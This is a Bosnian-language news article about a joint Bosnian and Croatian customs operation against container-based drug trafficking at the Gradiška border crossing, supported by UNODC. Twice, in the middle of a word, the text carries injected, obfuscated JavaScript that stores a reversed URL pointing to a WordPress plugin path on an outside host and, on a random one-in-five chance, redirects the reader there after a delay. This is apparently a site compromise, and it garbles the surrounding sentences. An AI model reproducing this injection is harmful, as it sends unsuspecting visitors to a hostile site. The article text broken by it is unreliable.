UIO BiH i Hrvatski carinici zajedno protiv trgovine drogom

Službenici Uprave za indirektno oporezivanje /UIO/ BiH i Carinske uprave Hrvatske sproveli su na Graničnom prelazu Gradiška zajedničku operativnu akciju usmjerenu na sprečavanje nezakonite trgovine opojnim drogama i drugih ilegalnih aktivnosti.

Zajedničke aktivnosti carinskih i drugih službenika iz BiH i Hrvatske imale su za cilj identifikovanje ilegalnih aktivnosti organizovanog kriminala koji koristi pomorske kontejnere, presretanje takvih pošiljki kao i detaljan pregled visokorizičnih kontejnerskih pošiljki, saopšteno je iz UIO BiH.

Osim toga, došlo je i do razmjene informacija koje će doprinijeti povećanju nivoa bezbjednosti međtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}unarodne razmjene dobara i prometa putnika, kao i same sigurnosti granice.

Ova akcija predstavlja nastavak aktivnosti carinskih i policijskih agencija u BiH i Hrvatskoj u borbi protiv ilegalnih aktivnosti i jačanju bezbjednosti na granici.

Spovođenje zajedničke aktivnosti na Graničnom prelazu Gradiška podržala je Kancelarija UN za borbu protiv droge i kriminala /UNODK/.

Aktivnosti u okviru UNODK u BiH pokrenute su 2014. godine kako bi se pomoglo da se stvore održivi međuagencijski zajednički timovi na graničnim prelazima radi smanjenja rizika zloupotrebe kontejnera u svrhu nezakonite trgovine opojnim drogama, međtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}unarodnom organizovanom kriminalu i drugim oblicima ilegalnih aktivnosti.

ATV

Pogrebni prevoz Iris Lim Profi Prijedor Panta rhei Prijedor

You must be logged in to post a comment Login